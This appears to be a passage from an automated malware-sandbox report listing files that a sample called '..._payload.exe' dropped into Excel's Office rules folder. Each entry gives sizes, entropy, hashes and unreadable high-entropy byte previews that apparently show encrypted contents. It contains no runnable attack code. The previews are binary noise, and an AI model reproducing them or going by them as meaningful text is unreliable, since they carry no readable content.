                                                                                                      SHA1:6EA3DC2D9817610928413393F95C9B171D378EAB
                                                                                                      SHA-256:68E25AEEB2C4543650E09E48ACA795C0385CE2AB2F1439471FCF4C0B5E962415
                                                                                                      SHA-512:C25B427B9EAB38970FE668454E5C442FDF3A7C2FAB1C576F70BC7D858C775C68C8305CCA4C48F9858AE72A5A12242E099D56FFEED4E5A3B6E078C154B54CA926
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml..&.Et..y...x...p..J....T..HW....fY....X..nN..5S........R..a4q......R..^..cnC..i..+.C.h..:....-.".......R..o..o'...ilD]..H.|.P.H..!...oppGu.>P..u.w.t.e.29..ok..+2P...j..Y..8....$5....b...~.X.....~.....F.s&....K..;H."?l..r...+.|7..)...Bl...qq9-PW.5........=._.1..=.o.......o.)..{...MC.*.cJ.Z.h..F...o./D...Bi...[?^...*.a_!.9$(..C.?V..E.vV.4.*I..*\.&...p...D....l...du\.eL.e...P....6.3......#u..k..?.1S..."./..|.y!otSer.GU.-;9.Sg&.I._.*e..^...../..jr.?-....e...T......9+..DZ.t........r... .d.^CO...g$q..w.<u.....O........<:!.QU\.I..S.....a.r.....?.a,T...D..../..,$.....T...Qk.Z~....k.c.L.q......!.y.es..m6..t.$u*.B........,....y.t..k..r.D..hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule270009v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):854
                                                                                                      Entropy (8bit):7.750548164237871
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:gHbUjGKe5N1+kB8LZCL0YmkmLklaNGDb68ZbeZXvnirWn8ynNzv6cii9a:Ybbv5NIkBHmk9wNGDb5GhnP1v6bD
                                                                                                      MD5:D3B5925A3478167105E4EEA36DC20B8C
                                                                                                      SHA1:5771A6290D931B82262AC4BA4999A5CEBF64BDF6
                                                                                                      SHA-256:A1914BE2354389C671BEE2B95CC0FAFA9AE03BFD9ED50D6A105E67784F8D499E
                                                                                                      SHA-512:6D6E8910D425EDB40159B212DB02DAD1F3B35493799B881E8C30B1690572D861DF9DFE6B7DF6FFFC151D38012C1ADAAA4502AA1A457EEFF45911E56335149118
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml#...t.BL...hH.........8l..M.=l.....].....k.:....kmt.........CQ...!. ......m.7.....F..p.(w...B.[,}8OI....y.M....Q.........f.&.5..AJ......h.W..B.Rl.e-.. ....9.t.M.[.sP.Z.).........pY-;V[f*.C.8.......].:...z..:....<T3..(a.TNX.]e.o.E. .W.:I-'.B.c......T9...BDx.\Z..j..\/.6Yz.....+y..a)...4......\....#....i.6....X..j68vy..a...c.]#.$..l.o\.i..!zB....;.w...XMA.,.p`.V.A.i..3.;.4H...z....q..lK.....V.fc...1.,M.Edl.Q.)..{....>E=...R.1^.5.*U.62...8.\F.>...}(..C....cD..,.m.....kJ..Y....k0.1&...9_.Ip.Q7..!pO.(.._...@#....gG..6*~.."c..YIQ.A.%|......K8|..T..0..u....M..^..tF8..|.Lj/2...L..+...{t.67n5.<x~....P#......(...B.../.S...!.0...n..+..t%!@...{..H....:.S|..Z..8.[......)...(.r$C.....O.....,!8$....U$J .m.c.E........SnP/.i..4.$hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule270010v3.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1612
                                                                                                      Entropy (8bit):7.8660321527112105
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:+WXh0tPDXG7gJMq2/9gquzahvgnTr6w7QmE1wD:+WXhKjok2J5dgsXW
                                                                                                      MD5:A170844811D9C0EE6F899218A7DEB1B8
                                                                                                      SHA1:2008FAD38CB5555D2305A4FCE23D18E09910948E
                                                                                                      SHA-256:044ACBA3CCA360048183F95FB427ED6434FB7C8102FA431DE771B665FA445417
                                                                                                      SHA-512:C94E9A0ECA2E3F1E66D4716AEFD57E7CE3E29166AE3DBAAE1D6CD5C1498CE7AB64FE2A538E0E1924E88CAF0E0DA1CF3253435368B3A20182FD0E8460252DEA84
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlr{....0....._..b...CM.&;;.K...h.8...}p2 .....8.!K....{,..<...j..^g....s>[.F.Nz.....4.N.$.%N.w.r"...I...H.U.2./.,[{L....C...ER.V|...f.Nd..m..d?...#..&. .Os+.>|...qsm...X.....k.....,...."..Vr..u..k.8.Q....2..c.z..)..u.hwk...?..OZ..a..g...k.U.i..+.T.rO.WX:|...`..S.Rq'.jE%`..=Z.2..g..L......|!.....-x......#.S...h/.R.(..E..B.U.N....X....N|"g...?.^...7..7..b.M8.,vLL/......d.#..3.+0_..O..D;2.YD:.3.'.T.......@R...y1....z9.l.:z.-...p.f.Z.Xe..=.\t\5.=1.. .#cZZG.H..?...%..[...!...."H......k.k..j.b.vu......~...!.....KK.6.&.[..?ms..K.["..Vr......`. .VL.....Ey."....4..K.l3Q.V|..p...zu.y..{...yw...I..,..._....dq..8..h...;...sQ.OC..>.....6..y..:...P.._w.5...t.GQYJY...."SI.l*U....:3.._.tJd~t:...@....<.[......bDg..8h1.O.D..=.oU.......FB..NN.0.......f..\r:..g5.6".K.....H.~(..juS4....a..../zJ....M(P. Q.5P.b..|h.$N..........?l..qMJ:.V. ......*......8..k7Z)F.B.T..|r.2.....S.P.XI...P.X.n.Kp.u0.\D.S....d...|.Nu....i..L..:)...~..5...s3.2~q...B_...

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule270011v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):747
                                                                                                      Entropy (8bit):7.772040611471351
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:uFsar9F0MeYTWk/D42l+IWMk/QbBMvIrif77t44bvGRHiClNB+e+0tfy0Ev6ciik:uFsEt/740ta+Bifnb/ClH+Rkfy/v6bD
                                                                                                      MD5:7B74CA1E6D737949A17C148B24E91144
                                                                                                      SHA1:C09DF1008F389B074404061778A32BB13C224852
                                                                                                      SHA-256:0C0A0D1871C6EE8EA506EBCE5FD2C143F3BC79BF9C2FC19C5257E875F4D9EDC7
                                                                                                      SHA-512:AB9F45BBB7E5D66F9237ADD687168519F60F12C4ED1C20AB46F066AB5A9AD38541A7C32F802BEEB0DDB9FB212E79821BEF3CA4707386B3DF6D73ADAC23699E01
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml....uI.zev.......~..t...u.Ll.x.l.....A.."*.n..,....M.k...f..a....=.g....O.t............@?hDv.6.;..+%z.#E.g..p...c.G..L..L..'U...2:......K'..z >....j...}C\n.....;..j.....X.>!.c.0|k.>.....p..jd....+Y{.....f.P...)n...-/....k.n...F.g......px.......O..>.lU....Z.?z..E%q..;jz..f.'S...N=.....r..;...-|.R...;......nS*H.-..z...p..]..u....hq.D0%..N...J......J.F.D){._l.......O.h.:,...\.9..#I...FC.8.FK3.RFl.I...vw.....@.]uQ<W...Q..N..$^......[.~...za\6P.."..A.....V..:}.o.....!5........[.o...".1.'.3...;.r...^...&...r.W...w... .KV.....=.E.%$.^}%.55........%=.....(z.......t....#;......D....i*..P.H2.mB.'.`=.8j....G.......l.....y{..4.D.`.....-*....EL..hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule270012v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):742
                                                                                                      Entropy (8bit):7.747466276475307
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:aPKpxAE68BGguRMoFHP8uw589EN8DRMT9Lv83ZGTch8W2dlX/qFEebIo1v6cii9a:z0n85ufHjvEGVg9b3flPE6o1v6bD
                                                                                                      MD5:A15B098F6EC17741E05B8C55B90434FD
                                                                                                      SHA1:F303C5CDAA47930D30474E5C5DD900EBB04EA678
                                                                                                      SHA-256:FA2C6539431E2FBD5C1AA61C4E2EC12B94AD7A76B9D97B9EFCDFFDBAE17116A5
                                                                                                      SHA-512:79FEFFBE62FD5E76066E6EAAEB99ECFA07BC90630BCFDD177E6ABAD765FB7CDE98F2BA10C691375DB143F2CB9EC4520A25F733A8FBAA4E61F8275E00F68099E3
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml......S....kU...h2.A..u..<Y..r)+..kg.....k...Ab..4s..q..........+......4...T...-.h_..Z.i.;T..;.D..K.s"...D......g.r.<s..4..j...A..'#[...cL....lN.A4..P/.+.\.1......._f.8.{..`..._}l.9$.A....S/KRz..q.2^@......E.V.IW....3....Y..{..#..e.I.....E....c......IIU.....x...o..{.;1F..\/ T.~.'....U]m....os._R..PW...%.a*.t.$..M0......!...=Z..V.&..... w..hC.....U........$.`.......U3.Z}..jw.1......vR......q.l.<>...TTM.Q..[Y...i..G.............C.`.Y..T.{..&..LPy.}W.......(J}....~.k.....W..b.......p.:mn.nP...n.........Lghi............Na....B.,N..7....q..A..<.q....&v..EC]..xR.lV..Ha,.....y87......YxU.ii`?...Q.`.[(....R;.^..w.:7.y).2v...hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule270013v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):756
                                                                                                      Entropy (8bit):7.679166876312078
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:aX8zOmaLsKw4ec3jbgIooCwy54eHL/3NPh0IIlQhpgfTNH8mQkUxMKDp+MkWmJQr:lswS3jEozeHL/3F5i0pgBcmlY4nJQMKn
                                                                                                      MD5:B16478E7478B031A9C1133C5D2E420E2
                                                                                                      SHA1:CCC21CA9D6073102A7711981336424DE80D1E0FA
                                                                                                      SHA-256:D25E528FED856B943A2ED6BFBEE550440CD8FD1AA94DDAD2F85B3F5C7023B1B7
                                                                                                      SHA-512:3F1FBF726D8D7DC0C6E966E2FB7F3E63FC2A1F46237A66EC70E5999B5BF0D495D0DE6242A86073FC5F7560CA6C9835041ADB2463D0C06A285AAC8B8B0E55803F
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.:.....>.P1~V..p.. ...%A ..8u.j.....{...'..5.6y.=C..K..s....U9.#.....*@.<..._..^0VR..E..q.1..or..?.1.B.(.dxv,.o.O...p..Y...|...+..z ...j.'..OC..Im/.......:...z...+...U`..n.D..cw.........G.jF......-9..+..........d..g.E..4IBu....b.x]b.+h2.Y.:.o......"9..{".X.}.9...W..!NC..B..+..u.._...]Y...0=Jf..@.\.F4.Q...mN..j...$..*.-u;........./..f..#.u.7."e_I.+..-...1").f&.<.$.}1...Wm...CY~.z...&z$.I......ij.."5a.]c_.Y..........y...(`.C.M.4.k..&s.....S.l...!'. ..Y5.......g.sr...w%.n..$..S....n.E..tb.V)........XSH;z..(..[.J.#g.InH^j.k/..rC.P.-.{.':x....a.H..E..M..[&..M..u^B..n..%>%,......p.Vqbn0LQ.7..bL...-.?8.q%oZ..k-./..-y.V.9....O...,U...m.oo....$....hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule270014v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):763
                                                                                                      Entropy (8bit):7.7166309392514405
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:de7m2zcJaAduu5/h2EKH0r8WlzLUe9phoqNl6oWO1hkrQ9f1SPDpsOmFBMQe03oY:j2zcJJxf2Eokpho2l661hyDaOgBMBO8s
                                                                                                      MD5:00BDF0B3B5525DAB45616214FD8E3F21
                                                                                                      SHA1:C00CFBAC30FC52D842953387EF1BEC7436DD9AA7
                                                                                                      SHA-256:BADED6BCC2D3AF16A3D8D9EF3872AF7D30E058D5B61EAEB1057EFBA0DB642CA8
                                                                                                      SHA-512:2ED7487C51D3E59757FBAF823C719DEB3FF09F2A35B53190ABAC01CCEDEA565F04D2D6317906F44B2FC0FE467AAEF2618FFD3131430A72102AD530CD621D18E1
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml76......~skJe...V......~...H.~.M.l...1|.&..^z..s.).n.JJ..`m..F!..v....Vy..P"9..)..t.8.2.r........@..l..`I...j......0....F}.....I....*1W.yz.h.......,...WJ..ny\6.3.d...N..kG...R.K...p...\.....5g.X....v&...W._f/..J..x.~........#.....I...C..r....r........i.i....PL........v..}_o.g....h...[;=i.L].v.D..GA.~...\..S...g./....\..B..'5J..z^L..3.ZJ....n../.....aB.Y..5.7\C....O....D...Q.j....+.VG}3.fDL...;..5t..W...sk...J......^,..#v..{V.^.<.4.=.J.9g.won.2.....~}Y...-]._..Owza....1Y.U];.T...#Z|.cJ@......J}c.,..q*.vs.M.I...Qe...B.....lx.J.n..e5.....(6r...e(..Pa.........VS..#....f..v\=.f|d.._..k...+.B..'N.c".99N;..8.MPE..T..W..z9..P...R.?.....(X|Im..%.!..BThZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule270015v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):956
                                                                                                      Entropy (8bit):7.764044113660115
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:ThF+YIHTrFmvAheYjjGvKmGTdxuKKsX767v6bD:9A7zRhrjGXsv9XO7wD
                                                                                                      MD5:25F83F80DCBDB87C1943A8638DAE9CA5
                                                                                                      SHA1:21E497035CB5A5C002AC393EC0BB967855E53F3F
                                                                                                      SHA-256:44DE4290E4CF208F53C3B829BF14C571CEE13756F598C26BADD34CF935F6BA93
                                                                                                      SHA-512:D9EF2F5272F8A13AA4678E800E3CF556EE38BB4670D5200B72CA3A367893598926C891DB428928F488EBB0DB77D9081C3D6D530D78DE4585875C0675D913292F
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml..q..#.l^..P..D...X.2 N......k.] 2*x...<.....d_...W........e*N.@.!a....y)J......(....s..g.u.h....G.......?..J..*%..C ......"..=....z..R..BPN........D/..2h.Fhk..!...l?k..*......].....(P.in........B.3o....n!..Kx.>B......a...5..&..U.w\......$@_..Vv`._.Q.....6.........1G.J..(@.R[q>..7....y...j.....6.B7?..I..zl..20..;~...83...g..!.(...^*....0X..OR@.i..J.....~......(...*..X2..-.R..Km.Y.F0.#..N......9:9{......N.....f]F.....U.f....(u.f.QPj..s...'..9i.A .2.....r.j..M$.{...E.2&/......../..[...*.1+.M.J.."....(..F<j'..P.zl1.....1...-$.d.....~'-.Ef.Cj....7.].P.#...4c..M.....f..........nrR.....N...C....MS.V.I...5.>......h]4T.U.z...!p...$...'.I......n .<.....(.R.. {'~.......;t....E9......T..sV.w...8...T&....0sE.......H..D...<....#W...<.....Ij.0..^.D....X;Wk..E....I.M.3w.V)./.S.'(..R.6=..."Z...aCxC{...yJ2...j...o]>.B..,..(.A.hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule270016v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):837
                                                                                                      Entropy (8bit):7.791166833278764
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:wfeNIn0awzRBXY273rGxLbIqh/5ySkkZWKPv6bD:G1EPYF8SHLPwD
                                                                                                      MD5:C8E72A53D5731D0957DAFB67AC25BE88
                                                                                                      SHA1:C1A3974ACDD190A469A0C805BE574E1F5D9C9E61
                                                                                                      SHA-256:23A0C12F8F47DE75EAD404F368C59BA0E77F13601B511C5FD06FDD5D825C9A34
                                                                                                      SHA-512:1E6151A439521051825704FA1DB399C5EB37DA031A824BC4FAE68C043CB277931DDC03131899BBC221DB003D01E76FCD13A3839F95525F8C2350D5FD46211A01
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.o.._..m..E+..."G...#..F.w....H...:.=..6...p.....1..=.:|..E...D.C......`...l..H.Y......O....Q.Y].o...so.........G...N>Hdz...B.]Z."<A.....m....`.(../a!...".rs...ho.S...C.Z.9....6.w...c@... s...{...^..c.-a...*.n2.(...M8.^1zX...N....[..:J.N[..........^.....t.N.......Uv..y.r. b.n....sD.EM..3.xd.EL.O.D&..[...M@.\..W.1.`....5+......E.w.....vF.0.3.e@..H....]Xh.. !..._..Hi....a<)&. .|4...+..~WZ.."q*.a..'.l.O[.WR5.U..f.pL<..,*b'2.>...a..J...m.e..u.a.........z.53..@'.!...T.+..H8..K..<.mi..lA.y......?zP........9{.<3.k...2...b%A....'...t.K.3Zk.;...YS:..=.{.h.QM.....}...@@\.W.{.....\7Ym.....N.B..)4C...}.......Uq..)..:..|E. ........V},.04.I'r.E.>.;.$......#)./N..qf..........Ad......Xh...mj...%.....]......H.UhZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule270017v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):851
                                                                                                      Entropy (8bit):7.7632047207171
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:ImrnGp4BvTuNbxwTVBdmWnPLjj2p//NrdL7v6bD:frm4tebmThmYfQFFwD
                                                                                                      MD5:0B16BBD7143A7557702A207514CE5914
                                                                                                      SHA1:0626975D807553367B2F60E569739B71B1401876
                                                                                                      SHA-256:228988F14D9DD62D34CBA23E033A756335DC268704C11E70C4E65B4609DB2342
                                                                                                      SHA-512:4E22C2FA41514971B3339B37094367C865D5FA6951C6F390726297D42FE540747AE3E96399E199CBF368419C2532F08AF5A10CAF316F4540A4A513B0AFF0C154
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml...A.....4....{H.K...~.!.Z.3.....G..).(..e!....-..S.P.....1.<.&....c.......v6...kw...k.q....V...OZ....../4..n`Sl. .(..2.E.$... .*..,.....&+...O.5B.....$yX.....-".oR..}(=.."..!.....>....d:....F...5.....Y.c...F:....qJ.Y..#Y#.V.Y.Ia.M8.d.y.*..a.~..:...TO..?......@h..W)..}K..d.&.......\.S..Hz6.v]..i.H{..O.O..'Xa.H..8..M..@..HI...v...*EM.#..Z........P.....-.b.Q.$......@.w..t}.\..z.nf..4b.m%...Q...U+.}i.....R.o....l..zk...cJ..A..6>.g....i~{..yU..lh43!'......e."R..HwK..}.Kj![.....~I.0.K&.k1..$......~..DV..^.o.l....eC.......)..i..Yz...oK.A.M..o...h._...R......~J.Pkk..2%"......:^..0...m.r.*.C6.....WW...D..l.....Q.P%1B.....3QG....p.Cn.V\SE.(....k.........~..o0..J..?.\.3....I.Q..mFe.w...2.}.....b._.rQ..R.....,......j.7%..@N.O..pE..C.JhZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule270018v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):956
                                                                                                      Entropy (8bit):7.804262935809801
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:7w7F/JNza3DBZD4Iri101CoPtcfzzv6bD:7w7FBNzWHri101RPtcfzzwD
                                                                                                      MD5:14F6DD649C2645135A3E308AF51D7898
                                                                                                      SHA1:3139AF0F4152176B7FC965CB277BBC977A8C7BC4
                                                                                                      SHA-256:680CEAE56A27739CF0F9447CF85577D9F979931ED637DD3DA54DF6499CD343F6
                                                                                                      SHA-512:FCAD99C29C7DFA1F92177A58EB2E46EF4B99C20FB91CCE69EC48443F3B4573DDFFE29210DC95D8F0BD5271AF2CB924B3D150B6E81DC78AAAC28CC30C77E48117
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.3.]....T.D....lc....K............ng:j\.!+.H...Yj..?.,2...<....yh..#....:]b?..:......!.z#.."...K..k.......3.tl..^....MR..j.R......W.l.g.-x....x@W...... ..C.8..\}.ZU.x...4....g..I.)...t.7....B.T.....%/l.-.."......-...:2.V...~..O ._...f......_.Q...t..1,.m.=v........L.;M.!}.}...v.v.A..m.......4.wc..S[.B..s.l...2._.=.7.......*U.f.j.k+....?.!.'..q...r......I;~.7.b.y..X...C.0...3...6Nq.4n.S..)..?7:.....q..A.....pbq.....<...........z.w.%..f.n..'......t..d.V:.........`.....f.b..stK.M.b..0.....|.}ig%7....|.....7+T..A.C..&...@.;#8{.J..r......1.....h...C.[..I%.2.:../.....l. IFR.K../..UD..8|...K.L...K..:F2.G....@.I.#~2....>.....&..eiI..,....NHY.|.ipx...5.....K.!..@gX..W..C^. .n..a$OIV......0N.....L..J.../.E3A..F..e.A.['.m....E....b.3.R...*...I.u....t..>.o8m.!+....,.s.NO....N..A&.:.}......x.#.z..V.......q..M.%..T.M.......y.m%hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule270019v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1135
                                                                                                      Entropy (8bit):7.774020169468175
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:6zD496R3/QqFxuBj8Xr/KDFpbDwfOicWXyv6bD:6v/5/rFxulwzOliBywD
                                                                                                      MD5:9E38D4BC30AACECA2FFF709D501342DD
                                                                                                      SHA1:372D5E81AC851367BD37892225EC0E299840EED9
                                                                                                      SHA-256:B01635544BE50104DC3750B13FDE9F9A1E7EA84C5078337DADF99129F4281D04
                                                                                                      SHA-512:7473CE944AA3493F14C09F5C3C48F94F179DEA34BD6C0632889241788A33DE89CBB04F38C5A0CAE827FEDB0CD0DB9E506E0810F2AB98C53683D993B2C9BF00C2
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml..f.G.o{.\0.%...(...g.....JZ!..-|4......F.%.D<...%;@/.;../1.~7.....Tq%./..d..M..T....da..q..s.~.%*r(..`...)......;G..R>p.{._I ...I.L.'&V..<.7...,...2......,+.r6Rq7.....j..C..3.i..=...K..Lh2..r.........U...A.{. .U....j.....A..<.)....=#...e..C...<h..u.6....3!(x.2.ybz.....2.w..../.....[..<)..+...N..Yy>....P...h. BwMP#_.....].G......(..Wn..j..Z..wm3B.Cs:........_.z)..]P..{.....2..u..)..<z.u.....d..B1..M.8.I....L...s....~..:..wL..i../..s.,.t:..LZ..k..-.b.C..P..H..Y..[.......S........>=..q...@S..5.T.......n&............0g.[..?...........aq0.u.........n..a(MRV+..#..>.|..PUBJ./..x.Ay:....{.6..h.P;.^,8.C.PY[.!.b.$5../c/).@..M.......h....mi#....rji{F0[.A9..G. .~....(..hM.a*...6.q\.+..Ay......Hn.b]N._.....|]...s......<{.R.."z.y..[.L....T.<.....6Yb.nS....cB.O.ID.i..)..FKM......N..!.3.z...NN..R;4.[.LT<......9...frS...W+.....G..).....QN..$...-=e./.X....eu! s]........b.>.....E....?.......g..qN.7...c....{9mN;.7.V....?.D..Z...=mM...b....Ea.#.....

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule310000v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1869
                                                                                                      Entropy (8bit):7.89415703156765
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:QgJLBoIF3nDIFMo6eoLYSAouYem5IJGQRPBDwD:Q0BoxFoarYemW1o
                                                                                                      MD5:A31654CF4EB725BC4FB109B8E871C87A
                                                                                                      SHA1:D4B53F2F6EC9D47B1C0012037E95DBB5BA09A538
                                                                                                      SHA-256:87243636824F7B98FB56490C03A1D6F55422EDE230232826916652169A222599
                                                                                                      SHA-512:A15425AD485692C392B7346EE54155679F9B7457FC0C2171A542B600CBDE31357DE9F6CCD31E6243DA46FAD65724A76CA1831246C4FE34EBDD5BB1A784B53D2A
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml->.2L...,.B......ga..6......3....%"<..c.L....fE.:......h...M..qa.L.}.S.O.f.BYo..0.|.i..$..P...?n..L.$.@p.J.%...U{...R\%H3...kh....AkjA..........H.~.4.f..........p0..S`<Q}....q.q..k......#BdhRG...9w$s.o.Qy'.<..$v..Y...2.J(./@CH....S=..?..Jb.9.0.P..y..;...|.1..R..W.....@..,....u..,..>..w.,.P.6_Z..f...$a.~}..^....<f.qM.,.WBb....d_Zx@=.X.I.........R.F.Y..o...I..0.:m.....b....T~i5u0.l.....j..j.E."BaI......5.AF.3Y_...{.o....i..ybnWA%5*]...zZ.Y.V.)X..........x....Mt)....E{.K.Z..*..3_.....lB#|.[..l.{...Q.........2..K.%.9?L..:.2f.I..S%G..Ag.j.BR.?......?.|.....Kd.=..f..f...'..Hv.7.&..V......<.g.....[.:.zn`...Y2...6.t...Qm...[<....FX..#T...6.....o...Nt..^d...#g.....].m-.F.@"...8.A..c....A6B.R......JtK....25....E...6...hT?eF.l:u..dP..O).6..*...kPzj..@.v...X.u7pOgB.:........k..qq..\..{|..]..3)....`..Hs..{..<..x......H..sQx...]T..0 8...,....S......+.t.o.(... ....-.p.\..s....5!P...:4.p...lb.......H..4S.....5d\crUW]Y..r.[...XM..r.D.I...z.k^Nzl.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule320001v2.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1358
                                                                                                      Entropy (8bit):7.8457050854187464
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:khqlAQAHJQ+HM6BUwAgFHGMhELvGtHPcukwU3buCaSN57Cfq09rqiBe1Mv6bD:ByJQCM+1Ej0DkVS+0cN6wD
                                                                                                      MD5:7034FA5A502506344452676394E7841A
                                                                                                      SHA1:6549A85081DF49C0873D5A13012FF9BF2569A394
                                                                                                      SHA-256:6098B57418BD932FA98893161DBBA73085AC90B3841E4A7913B6B5ED32CEE45E
                                                                                                      SHA-512:1DCBA3DDA2A9FF474947ADCDB7F7636A1691266AB46ED3C4E1AC7A368FAB5618E2B831C0A0D73A9A8EF7D791EC07F7BF12EB6356D09E78470364CD169FDF8DBF
                                                                                                      Malicious:false
